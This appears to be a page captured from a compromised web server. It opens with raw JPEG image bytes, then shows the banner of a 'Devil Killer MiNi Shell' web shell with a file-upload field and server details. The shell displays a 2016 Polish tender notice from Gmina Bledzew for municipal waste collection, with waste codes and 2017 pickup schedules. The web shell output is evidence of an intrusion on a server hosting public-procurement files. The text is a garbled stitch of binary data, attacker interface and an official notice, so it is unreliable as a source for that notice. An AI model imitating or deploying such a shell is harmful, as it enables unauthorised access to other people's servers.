JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161109/339517-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.bip.bledzew.pl' target='_blank'>www.bip.bledzew.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 339517 - 2016
              z dnia 2016-11-09 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Bledzew: ODBIERANIE I  TRANSPORT ODPADÓW KOMUNALNYCH  ZMIESZANYCH  I SEGREGOWANYCH  ZEBRANYCH  OD WŁAŚCICIELI  NIERUCHOMOŚCI  ZAMIESZKAŁYCH W  GMINIE BLEDZEW ORAZ  ODPADÓW ZEBRANYCH W PUNKCIE  SELEKTYWNEJ  ZBIÓRKI ODPADÓW  KOMUNALNYCH W BLEDZEWIE<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Urząd Gminy Bledzew, krajowy numer identyfikacyjny
              53393700000, ul.
              ul. Kościuszki 
              16,
              66350  
              Bledzew, woj.
              lubuskie, państwo
              Polska, tel.
              095 743 66 10, e-mail
              , faks
              095 743 66 11.
              <br />
              Adres strony internetowej (URL): www.bip.bledzew.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.bledzew.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.bledzew.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Urząd Gmny Bledzew pokój nr 1 Sekretariat, ul. Tadeusza Kościuszki 16, 66- 350 Bledzew</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>ODBIERANIE I  TRANSPORT ODPADÓW KOMUNALNYCH  ZMIESZANYCH  I SEGREGOWANYCH  ZEBRANYCH  OD WŁAŚCICIELI  NIERUCHOMOŚCI  ZAMIESZKAŁYCH W  GMINIE BLEDZEW ORAZ  ODPADÓW ZEBRANYCH W PUNKCIE  SELEKTYWNEJ  ZBIÓRKI ODPADÓW  KOMUNALNYCH W BLEDZEWIE<br /><b>Numer referencyjny: </b>RG.GR.271.28.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>4.1	Przedmiotem zamówienia 
Zadanie pn. Odbieranie i  transport stałych  odpadów komunalnych  zmieszanych  i segregowanych  zebranych  od właścicieli  nieruchomości  zamieszkałych w  Gminie Bledzew oraz odpadów zebranych w Punkcie Selektywnej Zbiórki Odpadów Komunalnych w Bledzewie. Do obowiązków Wykonawcy należy również dostarczenie mieszkańcom gminy Bledzew worków przeznaczonych do gromadzenia odpadów w sposób selektywnych. Odpady te to:  
- 15 01 01 papier i tektura,
- 15 01 02 tworzywa sztuczne,
- 15 01 07 szkło białe i kolorowe,
- 20 01 03 i 20 02 01 ulegające biodegradacji, w tym odpady kuchenne

Zebrane odpady z grupy:
- 15 01 01 papier i tektura,
- 15 01 02 tworzywa sztuczne,
- 15 01 07 szkło,
- 16 01 03 zużyte opony,
- 20 01 10 odzież,
- 20 01 11 tekstylia,
- 20 01 21* lampy fluorescencyjne i inne odpady zawierające rtęć,
- 20 01 32  leki inne niż wymienione w 20 01 29
- 20 01 33* baterie i akumulatory
- 20 02 01 ulegające biodegradacji,
- 20 03 01 odpady komunalne zmieszane,
- 20 03 07 odpady wielkogabarytowe
należy dostarczać do zagospodarowania do Regionalnej instalacji przetwarzania odpadów komunalnych w Długoszynie 80; 69-200 Sulęcina należącej do CZG-12 zwanyą dalej Instalacją w Długoszynie

W przypadku awarii instalacji w Długoszynie wskazane odpady należy dostarczyć do Instalacji w Kunowicach. Dostarczenie odpadów do Instalacji w Kunowicach jest możliwe tylko w przypadku wystąpienia awarii Instalacji w Długoszynie.  

Zebrane odpady z grupy:
- 16 06 01* baterie i akumulatory ołowiowe,
- 16 01 03 zużyte opony,
- 16 06 02* baterie i akumulatory niklowo-kadmowe,
- 20 01 13*  rozpuszczalniki,
- 20 01 25  oleje i tłuszce jadalne,
- 20 01 28  farby, tusze, farby drukarskie, oleje lepiszcze i żywice inne niż wymienione w 
  20 01 27,
- 20 01 80 środki ochrony roślin inne niż wymienione w 20 01 19,
należy dostarczyć do INNEKO Sp. z o.o. ul. Teatralna 49; 66-400 Gorzów Wlkp. zwaną dalej INNEKO w Gorzowie Wlkp.

Dostarczenie odpadów ma zostać potwierdzone kartami przekazania odpadów, które każdego miesiąca Wykonawca dostarczy Zamawiającemu do 15 dnia miesiąca za miesiąc poprzedni.

Wykonawca będzie rozliczał się miesięcznie z Zamawiającym w zakresie zapłaty za usługę, która obejmuje:
- zbieranie i transport własnym sprzętem do wyznaczonego miejsca odpadów komunalnych zmieszanych i segregowanych w tym gromadzonych selektywnie w pojemnikach typ IGLO,
-  zakup i dostarczenie każdego miesiąca worków przeznaczonych do gromadzenia odpadów komunalnych zebranych selektywnie i odbiór tych worków wraz z odpadami w nich zgromadzonymi,
- załadunek do własnych kontenerów (pojemników)  i transport własnym sprzętem odpadów zebranych selektywnie w Punkcie Zbiórki Odpadów Komunalnych w Bledzewie (dalej zwanym PSZOK) 

Worki o pojemności od 80l do 120l. do gromadzenia odpadów segregowanych takich jak: papier (worek niebieski), tworzywo sztuczne (worek żółty), szkło bezbarwne i kolorowe (worek biały lub zielony), odpady biodegradowalne (worek brązowy) zapewnia Wykonawca w ramach usługi.

Pojemniki 120l, 240l przystosowane do załadunku specjalistycznym sprzętem (śmieciarki bezpyłowe) i 1,1m3 przystosowane do załadunku specjalistycznym sprzętem (śmieciarki bezpyłowe) do gromadzenia odpadów zmieszanych zapewniają właściciele nieruchomości

Pojemniki typ. IGLO (rozładunek HDS) przeznaczone do zbierania odpadów segregowanych zebranych na nieruchomościach wielolokalowych zapewnia Zamawiający

Pojemniki o pojemności 240l przeznaczone do gromadzenia odpadów biodegradowalnych zapewnia Zamawiający.

Szczegółowe dane dotyczące ilości  pojemników w poszczególnych nieruchomości gminy Bledzew z których zostaną odbierane odpady komunalne zmieszane i segregowane oraz którym należy dostarczyć worki do segregacji odpadów zostały przedstawione w rozdziale 4.5 pkt 3 SIWZ.

Odpady zebrane w PSZOK (wielkogabarytowe, odzież, tekstylia,) nie są składowane w pojemnikach, kontenerach, jednak Wykonawca bez obciążenia Zamawiającego dodatkowymi kosztami może na własny koszt ustawić takie pojemniki (kontener). W tym celu Wykonawca musi posiadać odpowiedni sprzęt i pojemniki. Ustawiony pojemnik (kontener) musi mieć otwierany jeden z boków celem swobodnego umieszczania w nim odpadów przez mieszkańców gminy. W przypadku gdy Wykonawca nie ustawi pojemników do jego obowiązku należy załadunek zgromadzonych odpadów do własnych pojemników na czas transportu. Do obowiązku Wykonawcy należy również załadunek  pozostałych odpadów zebranych w PSZOK, które objęte są usługą.

Koszty zagospodarowania wszystkich odpadów w Instalacji w Długoszynie oraz INNEKo w Gorzowie Wlkp. ponosi Zamawiający.
4.2	ZABUDOWA JEDNORODZINNA
Na terenie zabudowy jednorodzinnej obowiązywać będzie system mieszany tj. pojemniki 120l lub 240l przystosowane do załadunku specjalistycznym sprzętem (śmieciarki bezpyłowe) z przeznaczeniem na odpady zmieszane wg zasady: jeden pojemnik o pojemności 120l gdy w nieruchomości zamieszkuje do pięciu osób lub jeden pojemnik o pojemności 240l gdy w nieruchomości zamieszkuje ponad pięć osób oraz worki o pojemności od 80l do 120l z folii LDPE z przeznaczeniem do gromadzenia odpadów selektywnych wg zasady: jeden worek na miesiąc na każdą nieruchomość na odpowiednią frakcje odpadów odbieranych w sposób selektywny tj. papier, szkło kolorowe i bezbarwne, odpady biodegradowalne oraz dwa worki na miesiąc na każdą nieruchomość na tworzywo sztuczne.

a) niesegregowane (zmieszane) odpady komunalne (kod odpadu 20 03 01)
Niesegregowane (zmieszane) odpady komunalne gromadzone będą w pojemnikach 120l lub 240l. Pojemniki zapewnią Właściciele nieruchomości i ustawią je w miejscach łatwo dostępnych.
Liczbę pojemników podano w rozdziale 4.5 pkt 3 SIWZ  liczba pojemników może ulec zmianie.

Częstotliwość załadunku i wywozu  co 14dni  według poniższego harmonogramu:
Harmonogram usuwania nieczystości stałych komunalnych zmieszanych z nieruchomości zamieszkałych:
Miejscowości  I strefa: 
Bledzew, Bledzewka, Elektrownia, Katarzynki, Krzywokleszcz, Osada Rybacka, Popowo, Popowo Leśniczówka, Stary Dworek, Stary Dworek Leśniczówka, Tymiana, Zemsko:
Rok 2017:
- 2, 16 i 30 stycznia
- 13 i 27 luty
- 13 i 27 marca
- 10 i 24 kwietnia
- 8 i 22 maja
- 5  i 19 czerwca
- 3, 17 i 31 lipca
- 14 i 28 sierpnia
- 11 i 25 września
- 9 i 23 października
- 6 i 20 listopada
- 4 i 18 grudnia
Miejscowości - II strefa: 
Chycina, Dębowiec, Goruńsko, Kleszczewo, Kryl, Nowa Wieś, Osiecko, Pniewo, Sokola Dąbrowa, Strużyny, Templewo i Templewko:
Rok 2017:
- 3, 17 i 31 stycznia
- 14 i 28 luty
- 14 i 28 marca
- 11 i 25 kwietnia
- 9 i 23 maja
- 6 i 20 czerwca
- 4 i 18 lipca
- 1, 16 i 29 sierpnia
- 12 i 26 września
- 10 i 24 października
- 7 i 21 listopada
- 5 i 19 grudnia
Wykonawca zobowiązany jest dostarczyć właścicielom nieruchomości z których usuwa odpady komunalne zmieszane harmonogram wywozu odpadów.. Harmonogram na rok 2017 Wykonawca zobowiązany jest dostarczyć min na 7dni przed pierwszym wywozem odpadów.
W przypadku niewykonania przez Wykonawcę obowiązku w zakresie dostarczenia harmonogramu, czynność tą wykona Zamawiający na koszt Wykonawcy obciążając go kosztami. Koszty te stanowić będą dostarczenie do każdej nieruchomości objętej systemem usuwania odpadów harmonogramu za pośrednictwem poczty. Po wykonaniu tej czynności Zamawiający wystawi Wykonawcy fakturę obciążającą.  

b) selektywnie zbierane odpady komunalne kody: 15 01 01 papier, tektura (w tym 20 01 01), 15 01 07 szkło (w tym 20 01 02), 20 01 08; 20 02, 01  odpady ulegające biodegradacji, 15 01 02  tworzywa sztuczne (w tym 20 01 39).
Selektywna zbiórka odpadów komunalnych na terenie zabudowy jednorodzinnej będzie się
odbywać w systemie workowym. Wprowadza się następujące rodzaje worków:
- w kolorze niebieskim na odpady z papieru i tektury,
- w kolorze żółtym na odpady z tworzywa sztucznego,
- w kolorze zielonym lub białym na odpady szklane kolorowe i bezbarwne,
- w kolorze brązowym na odpady biodegradowalne
Worki do selektywnej zbiórki odpadów zapewnia Wykonawca w ilości: po jednym worku na miesiąc na papier, szkło kolorowe i bezbarwne oraz odpady biodegradowalne oraz dwa worki na miesiąc na tworzywa sztuczne dla każdej nieruchomości.
Charakterystyka worków w rozdziale 4.5 pkt 11 SIWZ.
Częstotliwość załadunku i wywozu przez Wykonawcę odpadów zebranych selektywnie  1 raz w miesiącu zgodnie z harmonogramem określonym w pkt. 4.2. lit b
W przypadku zabudowy jednorodzinnej i budynkach zamieszkałych do 6 rodzin Wykonawca dostarcza worki do selektywnej zbiórki odpadów bezpośrednio właścicielom tych nieruchomości.

Harmonogram usuwania odpadów segregowanych z nieruchomości zamieszkałych:
Miejscowości  I strefa: 
Bledzew, Bledzewka, Elektrownia, Katarzynki, Krzywokleszcz, Osada Rybacka, Popowo, Popowo Leśniczówka, Stary dworek, Stary Dworek Leśniczówka, Tymiana, Zemsko:
Rok 2017:
- 30 stycznia
- 27 luty
- 27 marca
- 24 kwietnia
- 22 maja
- 19 czerwca
- 31 lipca
- 28 sierpnia
- 25 września
- 23 października
- 20 listopada
- 18 grudnia
Miejscowości  II strefa: 
Chycina, Dębowiec, Goruńsko, Kleszczewo, Kryl, Nowa Wieś, Osiecko, Pniewo, Sokola Dąbrowa, Strużyny, Templewo i Templewko:
Rok 2017:
- 31 stycznia
- 28 luty
- 28 marca
- 25 kwietnia
- 23 maja
- 20 czerwca
- 18 lipca
- 29 sierpnia
- 26 września
- 24 października
- 21 listopada
- 19 grudnia
Wykonawca zobowiązany jest dostarczyć właścicielom nieruchomości z których usuwa odpady komunalne segregowane harmonogram wywozu odpadów. Harmonogram na rok 2017 Wykonawca zobowiązany jest dostarczyć przy pierwszym wywozie odpadów komunalnych zmieszanych w roku lub w terminie określonym w pkt 4.2. dla odpadów komunalnych zmieszanych.
W przypadku niewykonania przez Wykonawcę obowiązku w zakresie dostarczenia harmonogramu, czynność tą wykona Zamawiający na koszt Wykonawcy obciążając go kosztami. Koszty te stanowić będzie dostarczenie do każdej nieruchomości objętej systemem usuwania odpadów harmonogramu za pomocą poczty. Po wykonaniu tej czynności Zamawiający wystawi Wykonawcy fakturę obciążającą.    
4.3	ZABUDOWA WIELORODZINNA
Na terenie zabudowy wielorodzinnej obowiązywać będzie system mieszany tj. pojemniki 1100l przystosowane do załadunku specjalistycznym sprzętem (śmieciarki bezpyłowe) z przeznaczeniem na odpady komunalne zmieszane, pojemniki Iglo z przeznaczeniem do gromadzenia odpadów selektywnych oraz pojemniki 240 litrów na odpady biodegradowalne.

 a) niesegregowane (zmieszane) odpady komunalne (kod odpadu 20 03 01)
Niesegregowane (zmieszane) odpady komunalne gromadzone będą w pojemnikach 1100l. Pojemniki zapewnią Właściciele nieruchomości i ustawią je w miejscach łatwo dostępnych . W zabudowie takiej dopuszcza się również wyposażenie gospodarstw domowych w pojemniki 120l lub 240l z przeznaczeniem do gromadzenia odpadów zmieszanych.
Liczbę budynków wielorodzinnych podano w rozdziale 4.5 pkt 3 SIWZ.
Częstotliwość załadunku i wywozu  co 14 dni, zgodnie z harmonogramem określonym w pkt 4.2 lit. a 
b) selektywnie zbierane odpady komunalne kody: 15 01 01  papier, tektura (w tym 20 01 01), 15 01 07 szkło (w tym 20 01 02), 20 01 08; 20 02, 01  odpady ulegające biodegradacji, 15 01 02  tworzywa sztuczne (w tym 20 01 39).

Selektywna zbiórka odpadów komunalnych na terenie zabudowy wielorodzinnej odbędzie się
w pojemnikach typ Iglo. Pojemniki w liczbie 10 zestawów zostaną ustawione w  następujących miejscowościach: Bledzew  3pkt (3 zestawy), Popowo  1pkt (1 zestaw), Kleszczewo  1pkt (2 zestawy), Nowa Wieś  1 pkt (2 zestawy), Osiecko  1 pkt. (1 zestaw), Chycina  1 pkt. (1 zestaw). Wprowadza się następujące rodzaje pojemników tworzących zestawy:
- w kolorze niebieskim na papier i tekturę,
- w kolorze żółtym na tworzywa sztuczne,
- w kolorze zielonym, białym na opakowania szklane kolorowe i bezbarwne,
Pojemniki typ Iglo zapewnia Zamawiający

Zamawiający zastrzega sobie prawo dostawienia dodatkowych pojemników Typ Iglo w innych miejscowościach na terenie gminy Bledzew

Odpady biodegradowalne - pojemniki 240l w kolorze brązowym. Pojemniki tego rodzaju w ilości 24szt ustawione są przy pojemnikach typ IGLO  liczba pojemników może ulec zmianie. 
Pojemniki na tego rodzaju odpady zapewnia Zamawiający
 
Pojemniki do segregacji odpadów (typ IGLO i na odpady biodegradowalne) zabezpiecza Zamawiający. Częstotliwość wywozu odpadów segregowanych  1 raz w miesiącu zgodnie z harmonogramem określonym w pkt 4.2 lit. b 
Liczba nieruchomości z których należy usuwać odpady segregowane gromadzone w pojemnikach podana została w pkt. 4.5. ust 3.

W czasie trwania usługi Zamawiający zastrzega sobie prawo przestawienie pojemników w inne miejsca lub do innych miejscowości na terenie gminy Bledzew niż te które zostały wskazane powyżej.
4.4	Worki do gromadzenia odpadów zebranych selektywnie:
a) kolor worków:  papier  niebieski, szkło kolorowe i bezbarwne  zielony lub biały, szkło białe - bezbarwny, odpady biodegradowalne  brązowy, tworzywo sztuczne - żółty.
b) charakterystyka worków: pojemność od 80l do 120l, materiał  folia polietylenowa LDPE.
4.5	Szczegółowe dane charakteryzujące zamówienie
1) Powierzchnia Gminy Bledzew wynosi 248km2. 

2) Liczba mieszkańców
Liczba mieszkańców Gminy Bledzew objęta systemem odbierania odpadów wynosi około 3500 osób 

Ilość mieszkańców może ulec zmianie co zostanie wykazane na podstawie złożonych deklaracji

3) Liczba zamieszkałych nieruchomości z których należy odbierać odpady komunalne zmieszane i zebrane selektywnie wynosi około 700 z czego: 688 w zabudowie jednorodzinnej lub zamieszkałej do 6 rodzin oraz 12  w zabudowie wielorodzinnej tj. zamieszkałej przez więcej niż 6 rodzin.

Liczba pojemników w poszczególnych miejscowościach z których będą odbierane odpady komunalne zmieszane. Wśród wymienionych nieruchomości są budynki wielolokalowe zamieszkałe przez więcej niż jednego właściciela:
a) Bledzew  242,
b) Bledzewka  2,
c) Chycina  24,
d) Dębowiec  5,
e) Elektrownia  4,
f) Goruńsko  77,
g) Katarzynki  2,
h) Kleszczewo  29,
i) Kryl  4,
j) Krzywokleszcz  2,
k) Nowa Wieś  103,
l) Osada Rybacka  3,
ł) Osiecko  115,
m) Pniewo  7,
n) Popowo w tym  Popowo-Leśniczówka  68,
o) Sokola Dąbrowa  64,
p) Stary Dworek w tym Stary Dworek Leśniczówka  66,
r) Strużyny  4,
t) Templewo i Templewko  96,
u) Zemsko  82.

Ilość pojemników oraz nieruchomości może ulec zmianom w przypadku gdy ich właściciele złożą nowe deklarację dotyczące usuwania odpadów lub w przypadku budowy nowych nieruchomości - zmiana liczby pojemników nie ma wpływu na zmianę ceny usługi

Obecnie  w zabudowie jednorodzinnej około 60% nieruchomości segreguje odpady. Do nieruchomości takich Wykonawca będzie musiał dostarczyć worki do segregacji odpadów. Ostateczny wykaz (liczbę) nieruchomości do których należy dostarczyć worki zostanie dostarczony Wykonawcy przez Zamawiającego do dnia 23.12.2016r. Ilość właścicieli nieruchomości w których segregowane są odpady może ulec zmianie w okresie wykonywania usługi.   

Zmiana ilości właścicieli nieruchomości w których segregowane są odpady, w trakcie obowiązywania umowy nie wpływa na zmianę ceny usługi.

4) Szacunkowe odległości (rodzaje dróg tj. asfaltowa, gruntowa) pomiędzy miejscowościami położonymi na terenie Gminy Bledzew z których mają zostać odbierane odpady zostały określone z załączniku nr 7.

5) Na terenie gminy Bledzew w ramach odbierania odpadów komunalnych znajdują się bardzo małe miejscowości (przysiółki) w skład których wchodzi 1-4 budynków mieszkalnych. Miejscowości te oddalone są od większych miejscowości i dojazd do nich odbywa się drogami asfaltowymi oraz gruntowymi w tym leśnymi. W związku z tym faktem zasadne jest przeprowadzenie przez Wykonawcę wizji terenowej. Miejscowości takie to. Elektrownia, Tymiana, Katarzynki, Krzywokleszcz, Kryl, Chycina 24 (tzw. Korea), Bledzewka, Stary Dworek Leśniczówka, Popowo Leśniczówka, Katarzynki, Nowa Wieś 43A. W trakcie wykonywania usługi mogą pojawić się podobne lokalizacje.

6) Średnio każdego miesiąca przy obecnej procentowej ilości mieszkańców, którzy segregują i nie segregują odpady na terenie gminy Bledzew wytwarzanych jest:
- około 70,00Mg odpadów komunalnych zmieszanych (20 03 01),
a dodatkowo mieszkańcy dostarczają do PSZOK-u:
- około 3,0Mg zużytych opon (16 01 03) 
- około 1,7Mg odpadów wielkogabarytowych (20 03 07),
- około 0,1Mg odpadów odzieży (20 01 10)
- około 0,1Mg odpadów tekstyliów (20 01 11)
